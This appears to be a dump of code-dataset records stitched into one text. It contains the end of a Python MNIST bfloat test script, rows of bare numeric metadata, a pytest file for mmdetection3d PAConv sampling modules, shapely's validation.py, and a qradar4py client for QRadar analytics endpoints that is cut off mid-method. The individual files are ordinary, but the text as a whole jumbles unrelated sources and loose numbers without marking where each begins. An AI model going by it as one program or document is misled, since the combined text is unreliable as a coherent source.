0x0000, 0x0000, 0x3e74, 0x3f72, 0x3f7e, 0x3f7e, 0x3e50, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x3ef2, 0x3f7e,
0x3f7e, 0x3f5b, 0x3e20, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x3ef2, 0x3f7e, 0x3f4f, 0x3d90, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000,
0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000]
_mem = [0] * 32
do_mnist7_mem(img, _mem, 28*28)
for i in range(10):
if __python__:
from float2bfloat import float2bfloat
from float2bfloat import bfloat2float
print(i, _mem[i], bfloat2float(_mem[i]))
else:
print(i, _mem[i])
test()
| 55.628378
| 75
| 0.653711
| 948
| 8,233
| 5.638186
| 0.128692
| 1.452573
| 2.108138
| 2.716558
| 0.783162
| 0.776801
| 0.776801
| 0.76782
| 0.76782
| 0.76782
| 0
| 0.601911
| 0.237216
| 8,233
| 147
| 76
| 56.006803
| 0.249204
| 0.01166
| 0
| 0.484848
| 0
| 0
| 0
| 0
| 0
| 0
| 0.578384
| 0
| 0
| 1
| 0.015152
| false
| 0
| 0.083333
| 0
| 0.098485
| 0.015152
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
cb69bac8b80a4cffb481f5f3dd21ee71e8f19149
| 10,432
|
py
|
Python
|
tests/test_models/test_common_modules/test_paconv_modules.py
|
Bachmvp/mmdetection3d
|
b5b1a15a885eee92749e60a5837e2ce4918119f8
|
[
"Apache-2.0"
] | 10
|
2021-09-13T13:07:37.000Z
|
2022-03-15T06:46:30.000Z
|
tests/test_models/test_common_modules/test_paconv_modules.py
|
Bachmvp/mmdetection3d
|
b5b1a15a885eee92749e60a5837e2ce4918119f8
|
[
"Apache-2.0"
] | 1
|
2021-11-10T07:14:32.000Z
|
2021-11-10T07:14:32.000Z
|
tests/test_models/test_common_modules/test_paconv_modules.py
|
Bachmvp/mmdetection3d
|
b5b1a15a885eee92749e60a5837e2ce4918119f8
|
[
"Apache-2.0"
] | 1
|
2021-09-01T08:27:24.000Z
|
2021-09-01T08:27:24.000Z
|
import numpy as np
import pytest
import torch
def test_paconv_sa_module_msg():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import PAConvSAModuleMSG
# paconv_num_kernels should have same length as mlp_channels
with pytest.raises(AssertionError):
self = PAConvSAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4]]).cuda()
# paconv_num_kernels inner num should match as mlp_channels
with pytest.raises(AssertionError):
self = PAConvSAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4, 4], [8, 8]]).cuda()
self = PAConvSAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4], [8]],
norm_cfg=dict(type='BN2d'),
use_xyz=False,
pool_mod='max',
paconv_kernel_input='w_neighbor').cuda()
assert self.mlps[0].layer0.in_channels == 12 * 2
assert self.mlps[0].layer0.out_channels == 16
assert self.mlps[1].layer0.in_channels == 12 * 2
assert self.mlps[1].layer0.out_channels == 32
assert self.mlps[0].layer0.bn.num_features == 16
assert self.mlps[1].layer0.bn.num_features == 32
assert self.mlps[0].layer0.scorenet.mlps.layer0.conv.in_channels == 7
assert self.mlps[0].layer0.scorenet.mlps.layer3.conv.out_channels == 4
assert self.mlps[1].layer0.scorenet.mlps.layer0.conv.in_channels == 7
assert self.mlps[1].layer0.scorenet.mlps.layer3.conv.out_channels == 8
# last conv in ScoreNet has neither bn nor relu
with pytest.raises(AttributeError):
_ = self.mlps[0].layer0.scorenet.mlps.layer3.bn
with pytest.raises(AttributeError):
_ = self.mlps[0].layer0.scorenet.mlps.layer3.activate
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, 3)
xyz = torch.from_numpy(xyz).view(1, -1, 3).cuda()
# (B, C, N)
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
# test forward
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 48, 16])
assert inds.shape == torch.Size([1, 16])
# test with identity kernel input
self = PAConvSAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4], [8]],
norm_cfg=dict(type='BN2d'),
use_xyz=False,
pool_mod='max',
paconv_kernel_input='identity').cuda()
assert self.mlps[0].layer0.in_channels == 12 * 1
assert self.mlps[0].layer0.out_channels == 16
assert self.mlps[0].layer0.num_kernels == 4
assert self.mlps[1].layer0.in_channels == 12 * 1
assert self.mlps[1].layer0.out_channels == 32
assert self.mlps[1].layer0.num_kernels == 8
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, 3)
xyz = torch.from_numpy(xyz).view(1, -1, 3).cuda()
# (B, C, N)
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
# test forward
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 48, 16])
assert inds.shape == torch.Size([1, 16])
def test_paconv_sa_module():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import build_sa_module
sa_cfg = dict(
type='PAConvSAModule',
num_point=16,
radius=0.2,
num_sample=8,
mlp_channels=[12, 32],
paconv_num_kernels=[8],
norm_cfg=dict(type='BN2d'),
use_xyz=True,
pool_mod='max',
paconv_kernel_input='w_neighbor')
self = build_sa_module(sa_cfg).cuda()
assert self.mlps[0].layer0.in_channels == 15 * 2
assert self.mlps[0].layer0.out_channels == 32
assert self.mlps[0].layer0.num_kernels == 8
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, 3)
xyz = torch.from_numpy(xyz[..., :3]).view(1, -1, 3).cuda()
# (B, C, N)
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
# test forward
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 32, 16])
assert inds.shape == torch.Size([1, 16])
# test kNN sampling when radius is None
sa_cfg = dict(
type='PAConvSAModule',
num_point=16,
radius=None,
num_sample=8,
mlp_channels=[12, 32],
paconv_num_kernels=[8],
norm_cfg=dict(type='BN2d'),
use_xyz=True,
pool_mod='max',
paconv_kernel_input='identity')
self = build_sa_module(sa_cfg).cuda()
assert self.mlps[0].layer0.in_channels == 15 * 1
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
xyz = torch.from_numpy(xyz[..., :3]).view(1, -1, 3).cuda()
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 32, 16])
assert inds.shape == torch.Size([1, 16])
def test_paconv_cuda_sa_module_msg():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import PAConvCUDASAModuleMSG
# paconv_num_kernels should have same length as mlp_channels
with pytest.raises(AssertionError):
self = PAConvCUDASAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4]]).cuda()
# paconv_num_kernels inner num should match as mlp_channels
with pytest.raises(AssertionError):
self = PAConvCUDASAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4, 4], [8, 8]]).cuda()
self = PAConvCUDASAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4], [8]],
norm_cfg=dict(type='BN2d'),
use_xyz=False,
pool_mod='max',
paconv_kernel_input='w_neighbor').cuda()
assert self.mlps[0][0].in_channels == 12 * 2
assert self.mlps[0][0].out_channels == 16
assert self.mlps[0][0].num_kernels == 4
assert self.mlps[0][0].bn.num_features == 16
assert self.mlps[1][0].in_channels == 12 * 2
assert self.mlps[1][0].out_channels == 32
assert self.mlps[1][0].num_kernels == 8
assert self.mlps[1][0].bn.num_features == 32
assert self.mlps[0][0].scorenet.mlps.layer0.conv.in_channels == 7
assert self.mlps[0][0].scorenet.mlps.layer3.conv.out_channels == 4
assert self.mlps[1][0].scorenet.mlps.layer0.conv.in_channels == 7
assert self.mlps[1][0].scorenet.mlps.layer3.conv.out_channels == 8
# last conv in ScoreNet has neither bn nor relu
with pytest.raises(AttributeError):
_ = self.mlps[0][0].scorenet.mlps.layer3.bn
with pytest.raises(AttributeError):
_ = self.mlps[0][0].scorenet.mlps.layer3.activate
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, 3)
xyz = torch.from_numpy(xyz).view(1, -1, 3).cuda()
# (B, C, N)
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
# test forward
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 48, 16])
assert inds.shape == torch.Size([1, 16])
# CUDA PAConv only supports w_neighbor kernel_input
with pytest.raises(AssertionError):
self = PAConvCUDASAModuleMSG(
num_point=16,
radii=[0.2, 0.4],
sample_nums=[4, 8],
mlp_channels=[[12, 16], [12, 32]],
paconv_num_kernels=[[4], [8]],
norm_cfg=dict(type='BN2d'),
use_xyz=False,
pool_mod='max',
paconv_kernel_input='identity').cuda()
def test_paconv_cuda_sa_module():
if not torch.cuda.is_available():
pytest.skip()
from mmdet3d.ops import build_sa_module
sa_cfg = dict(
type='PAConvCUDASAModule',
num_point=16,
radius=0.2,
num_sample=8,
mlp_channels=[12, 32],
paconv_num_kernels=[8],
norm_cfg=dict(type='BN2d'),
use_xyz=True,
pool_mod='max',
paconv_kernel_input='w_neighbor')
self = build_sa_module(sa_cfg).cuda()
assert self.mlps[0][0].in_channels == 15 * 2
assert self.mlps[0][0].out_channels == 32
assert self.mlps[0][0].num_kernels == 8
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
# (B, N, 3)
xyz = torch.from_numpy(xyz[..., :3]).view(1, -1, 3).cuda()
# (B, C, N)
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
# test forward
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 32, 16])
assert inds.shape == torch.Size([1, 16])
# test kNN sampling when radius is None
sa_cfg = dict(
type='PAConvCUDASAModule',
num_point=16,
radius=None,
num_sample=8,
mlp_channels=[12, 32],
paconv_num_kernels=[8],
norm_cfg=dict(type='BN2d'),
use_xyz=True,
pool_mod='max',
paconv_kernel_input='w_neighbor')
self = build_sa_module(sa_cfg).cuda()
xyz = np.fromfile('tests/data/sunrgbd/points/000001.bin', np.float32)
xyz = torch.from_numpy(xyz[..., :3]).view(1, -1, 3).cuda()
features = xyz.repeat([1, 1, 4]).transpose(1, 2).contiguous().cuda()
new_xyz, new_features, inds = self(xyz, features)
assert new_xyz.shape == torch.Size([1, 16, 3])
assert new_features.shape == torch.Size([1, 32, 16])
assert inds.shape == torch.Size([1, 16])
| 34.773333
| 74
| 0.611676
| 1,514
| 10,432
| 4.060766
| 0.077279
| 0.050748
| 0.079701
| 0.051236
| 0.975114
| 0.969909
| 0.962915
| 0.94421
| 0.894925
| 0.8689
| 0
| 0.069164
| 0.23217
| 10,432
| 299
| 75
| 34.889632
| 0.698377
| 0.062117
| 0
| 0.802632
| 0
| 0
| 0.045706
| 0.025825
| 0
| 0
| 0
| 0
| 0.267544
| 1
| 0.017544
| false
| 0
| 0.030702
| 0
| 0.048246
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb87074da788855f7e82f073b6ec1768f63755d0
| 172
|
py
|
Python
|
TA-KML_lookup/bin/shapely/validation.py
|
l00py/KML_Lookup
|
76cf68bd97d0dd47e11bda7027d5b7ca2fdedaf5
|
[
"MIT"
] | 7
|
2017-10-26T00:23:17.000Z
|
2021-01-21T06:27:46.000Z
|
TA-KML_lookup/bin/shapely/validation.py
|
l00py/KML_Lookup
|
76cf68bd97d0dd47e11bda7027d5b7ca2fdedaf5
|
[
"MIT"
] | 12
|
2017-05-23T22:54:50.000Z
|
2019-07-31T17:26:17.000Z
|
TA-KML_lookup/bin/shapely/validation.py
|
l00py/KML_Lookup
|
76cf68bd97d0dd47e11bda7027d5b7ca2fdedaf5
|
[
"MIT"
] | 5
|
2017-05-23T00:44:10.000Z
|
2019-10-23T14:57:35.000Z
|
# TODO: allow for implementations using other than GEOS
import sys
from shapely.geos import lgeos
def explain_validity(ob):
return lgeos.GEOSisValidReason(ob._geom)
| 19.111111
| 55
| 0.790698
| 24
| 172
| 5.583333
| 0.833333
| 0.149254
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.151163
| 172
| 8
| 56
| 21.5
| 0.917808
| 0.30814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125
| 0
| 1
| 0.25
| false
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
cb9d231c7b4ba578657e6709ebe3434d6d071268
| 24,553
|
py
|
Python
|
qradar4py/endpoints/analytics.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 10
|
2019-11-19T21:13:32.000Z
|
2021-11-17T19:35:53.000Z
|
qradar4py/endpoints/analytics.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 2
|
2021-05-21T16:15:16.000Z
|
2021-07-20T12:34:49.000Z
|
qradar4py/endpoints/analytics.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 6
|
2020-09-14T13:44:55.000Z
|
2021-11-17T19:35:55.000Z
|
from urllib.parse import urljoin
from qradar4py.endpoints.api_endpoint import QRadarAPIEndpoint
from qradar4py.endpoints.api_endpoint import request_vars
from qradar4py.endpoints.api_endpoint import header_vars
class Analytics(QRadarAPIEndpoint):
"""
The QRadar API endpoint group /analytics and its endpoints.
"""
__baseurl = 'analytics/'
def __init__(self, url, header, verify):
super().__init__(urljoin(url, self.__baseurl),
header,
verify)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_ade_rules(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/ade_rules
Retrieves a list of ADE rules.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules')
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_ade_rules_ade_rule_delete_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/ade_rules/ade_rule_delete_tasks/{task_id}
Retrieves the delete the ADE rule task status.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules/ade_rule_delete_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_ade_rules_ade_rule_dependent_tasks_by_task_id(self, task_id, *, task, fields=None, **kwargs):
"""
POST /analytics/ade_rules/ade_rule_dependent_tasks/{task_id}
Cancels a dependent the ADE rule task.
"""
function_endpoint = urljoin(self._baseurl,
'ade_rules/ade_rule_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('POST', function_endpoint, json=task, **kwargs)
@request_vars('fields')
def get_ade_rules_ade_rule_dependent_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/ade_rules/ade_rule_dependent_tasks/{task_id}
Retrieves the dependent the ADE rule task status.
"""
function_endpoint = urljoin(self._baseurl,
'ade_rules/ade_rule_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_ade_rules_ade_rule_dependent_tasks_results_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/ade_rules/ade_rule_dependent_tasks/{task_id}/results
Retrieves the ADE rule dependent task results.
"""
function_endpoint = urljoin(self._baseurl,
'ade_rules/ade_rule_dependent_tasks/{task_id}/results'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def delete_ade_rules_by_id(self, id, *, fields=None, **kwargs):
"""
DELETE /analytics/ade_rules/{id}
Deletes an ADE rule. To ensure safe deletion, a dependency check is carried out. The check might take some time. An asynchronous task is started to do this check.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules/{id}'.format(id=id))
return self._call('DELETE', function_endpoint, **kwargs)
@request_vars('fields')
def get_ade_rules_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/ade_rules/{id}
Retrieves an ADE rule.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules/{id}'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_ade_rules_by_id(self, id, *, ade_rule, fields=None, **kwargs):
"""
POST /analytics/ade_rules/{id}
Updates the ADE rule owner or enabled/disabled only.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=ade_rule, **kwargs)
@request_vars('fields')
def get_ade_rules_dependents_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/ade_rules/{id}/dependents
Retrieves the objects that depend on the ADE rule.
"""
function_endpoint = urljoin(self._baseurl, 'ade_rules/{id}/dependents'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_building_blocks(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/building_blocks
Retrieves a list of building block rules.
"""
function_endpoint = urljoin(self._baseurl, 'building_blocks')
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_building_blocks_building_block_delete_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks/building_block_delete_tasks/{task_id}
Retrieves the delete the building block rule task status.
"""
function_endpoint = urljoin(self._baseurl,
'building_blocks/building_block_delete_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_building_blocks_building_block_dependent_tasks_by_task_id(self, task_id, *, task, fields=None, **kwargs):
"""
POST /analytics/building_blocks/building_block_dependent_tasks/{task_id}
Cancels the dependent the building block rule task.
"""
function_endpoint = urljoin(self._baseurl,
'building_blocks/building_block_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('POST', function_endpoint, json=task, **kwargs)
@request_vars('fields')
def get_building_blocks_building_block_dependent_tasks_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks/building_block_dependent_tasks/{task_id}
Retrieves the dependent the building block rule task status.
"""
function_endpoint = urljoin(self._baseurl,
'building_blocks/building_block_dependent_tasks/{task_id}'.format(task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_building_blocks_building_block_dependent_tasks_results_by_task_id(self, task_id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks/building_block_dependent_tasks/{task_id}/results
Retrieves the building block rule dependent task results.
"""
function_endpoint = urljoin(self._baseurl,
'building_blocks/building_block_dependent_tasks/{task_id}/results'.format(
task_id=task_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_building_blocks_by_id(self, id, *, building_block, fields=None, **kwargs):
"""
POST /analytics/building_blocks/{id}
Updates the building block rule owner or enabled/disabled only.
"""
function_endpoint = urljoin(self._baseurl, 'building_blocks/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=building_block, **kwargs)
@request_vars('fields')
def get_building_blocks_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks/{id}
Retrieves a building block rule.
"""
function_endpoint = urljoin(self._baseurl, 'building_blocks/{id}'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def delete_building_blocks_by_id(self, id, *, fields=None, **kwargs):
"""
DELETE /analytics/building_blocks/{id}
Deletes the building block rule. To ensure safe deletion, a dependency check is carried out. This check might take some time. An asynchronous task to do is started for this check.
"""
function_endpoint = urljoin(self._baseurl, 'building_blocks/{id}'.format(id=id))
return self._call('DELETE', function_endpoint, **kwargs)
@request_vars('fields')
def get_building_blocks_dependents_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks/{id}/dependents
Retrieves the objects that depend on the building block rule.
"""
function_endpoint = urljoin(self._baseurl, 'building_blocks/{id}/dependents'.format(id=id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_building_blocks_with_data(self, *, building_block, fields=None, **kwargs):
"""
POST /analytics/building_blocks_with_data
Creates a building block with supplied rule_data xml
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'building_blocks_with_data')
return self._call('POST', function_endpoint, json=building_block, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_building_blocks_with_data(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/building_blocks_with_data
Retrieves a list of building block rules.
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'building_blocks_with_data')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('fields')
def post_building_blocks_with_data_by_id(self, id, *, building_block, fields=None, **kwargs):
"""
POST /analytics/building_blocks_with_data/{id}
Same as com.q1labs.core.api.R1_2017.customrule.BuildingBlockAPI.updateBuildingBlock(IFrameworkServices, ISessionContext, ILogger, Long, BuildingBlockDTO) but updates rule_data xml as well
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'building_blocks_with_data/{id}'.format(id=id))
return self._call('POST', function_endpoint, json=building_block, headers=headers, **kwargs)
@request_vars('fields')
def get_building_blocks_with_data_by_id(self, id, *, fields=None, **kwargs):
"""
GET /analytics/building_blocks_with_data/{id}
Retrieves a building block rule.
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'building_blocks_with_data/{id}'.format(id=id))
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_custom_actions_actions(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/custom_actions/actions
Retrieves a list of available custom actions.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/actions')
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_custom_actions_actions(self, *, custom_action, fields=None, **kwargs):
"""
POST /analytics/custom_actions/actions
Creates a new custom action with the supplied fields.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/actions')
return self._call('POST', function_endpoint, json=custom_action, **kwargs)
def delete_custom_actions_actions_by_action_id(self, action_id, **kwargs):
"""
DELETE /analytics/custom_actions/actions/{action_id}
Deletes an existing custom action.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/actions/{action_id}'.format(action_id=action_id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@header_vars('fields')
def post_custom_actions_actions_by_action_id(self, action_id, *, custom_action, fields=None, **kwargs):
"""
POST /analytics/custom_actions/actions/{action_id}
Updates an existing custom action.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/actions/{action_id}'.format(action_id=action_id))
return self._call('POST', function_endpoint, json=custom_action, **kwargs)
@request_vars('fields')
def get_custom_actions_actions_by_action_id(self, action_id, *, fields=None, **kwargs):
"""
GET /analytics/custom_actions/actions/{action_id}
Retrieves a custom action based on the supplied action_id.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/actions/{action_id}'.format(action_id=action_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_custom_actions_interpreters(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/custom_actions/interpreters
Retrieves a list of available custom action interpreters.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/interpreters')
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_custom_actions_interpreters_by_interpreter_id(self, interpreter_id, *, fields=None, **kwargs):
"""
GET /analytics/custom_actions/interpreters/{interpreter_id}
Retrieves a custom action interpreter based on supplied interpreter_id.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/interpreters/{interpreter_id}'.format(
interpreter_id=interpreter_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_custom_actions_scripts(self, *, file, fields=None, **kwargs):
"""
POST /analytics/custom_actions/scripts
Creates a new custom action script file. Newly created custom action script files require a deployment before using.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/scripts')
return self._call('POST', function_endpoint, mime_type={'Content-Type': 'application/octet-stream'}, data=file,
**kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_custom_actions_scripts(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/custom_actions/scripts
Retrieves a list of meta-data for available custom action script files.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/scripts')
return self._call('GET', function_endpoint, **kwargs)
@request_vars('fields')
def get_custom_actions_scripts_by_script_id(self, script_id, *, fields=None, **kwargs):
"""
GET /analytics/custom_actions/scripts/{script_id}
Retrieves meta-data of a custom action script file based on supplied script_id.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/scripts/{script_id}'.format(script_id=script_id))
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_custom_actions_scripts_by_script_id(self, script_id, *, file, fields=None, **kwargs):
"""
POST /analytics/custom_actions/scripts/{script_id}
Updates an existing custom action script file. Updated custom action script files require a deployment before using.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/scripts/{script_id}'.format(script_id=script_id))
return self._call('POST', function_endpoint, mime_type={'Content-Type': 'application/octet-stream'}, data=file,
**kwargs)
def delete_custom_actions_scripts_by_script_id(self, script_id, **kwargs):
"""
DELETE /analytics/custom_actions/scripts/{script_id}
Deletes an existing custom action script file.
"""
function_endpoint = urljoin(self._baseurl, 'custom_actions/scripts/{script_id}'.format(script_id=script_id))
return self._call('DELETE', function_endpoint, response_type='text/plain', **kwargs)
@header_vars('fields')
def post_custom_actions_test(self, *, custom_action_test_request, fields=None, **kwargs):
"""
POST /analytics/custom_actions/test
Hidden end-point to perform a test execution of a custom action
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'custom_actions/test')
return self._call('POST', function_endpoint, json=custom_action_test_request, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('filter', 'fields')
def get_rule_groups(self, *, Range=None, filter=None, fields=None, **kwargs):
"""
GET /analytics/rule_groups
Retrieves a list of the rule groups.
"""
function_endpoint = urljoin(self._baseurl, 'rule_groups')
return self._call('GET', function_endpoint, **kwargs)
@header_vars('fields')
def post_rule_groups_by_group_id(self, group_id, *, group, fields=None, **kwargs):
"""
POST /analytics/rule_groups/{group_id}
Updates the owner of a rule group.
"""
function_endpoint = urljoin(self._baseurl, 'rule_groups/{group_id}'.format(group_id=group_id))
return self._call('POST', function_endpoint, json=group, **kwargs)
@request_vars('fields')
def get_rule_groups_by_group_id(self, group_id, *, fields=None, **kwargs):
"""
GET /analytics/rule_groups/{group_id}
Retrieves a rule group.
"""
function_endpoint = urljoin(self._baseurl, 'rule_groups/{group_id}'.format(group_id=group_id))
return self._call('GET', function_endpoint, **kwargs)
def delete_rule_groups_by_group_id(self, group_id, **kwargs):
"""
DELETE /analytics/rule_groups/{group_id}
